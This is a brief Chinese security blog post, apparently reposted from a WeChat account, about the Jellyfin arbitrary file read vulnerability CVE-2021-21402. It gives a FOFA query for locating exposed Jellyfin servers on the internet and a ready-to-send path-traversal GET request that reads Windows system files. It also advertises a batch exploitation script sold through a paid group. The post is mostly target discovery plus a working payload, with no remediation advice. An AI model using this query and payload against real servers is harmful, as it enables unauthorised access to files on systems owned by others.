Jellyfin 任意文件读取漏洞(CVE-2021-21402)

admin 2023年7月31日10:53:53评论50 views字数 279阅读0分55秒阅读模式

fofa语句:

title="Jellyfin"

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

我们随便点一个进入

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

接着我们使用POC

GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/Host:xxx.xxx.xxx.xxxContent-Type: application/octet-stream

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

python批量脚本已经放在星球上了

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

优惠券只剩下5,6张,用完后将不再发放优惠券

Jellyfin 任意文件读取漏洞(CVE-2021-21402)

也可以通过下面方式进入

Jellyfin 任意文件读取漏洞(CVE-2021-21402)


原文始发于微信公众号(bgbing安全):Jellyfin 任意文件读取漏洞(CVE-2021-21402)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月31日10:53:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Jellyfin 任意文件读取漏洞(CVE-2021-21402)https://cn-sec.com/archives/788958.html

发表评论

匿名网友 填写信息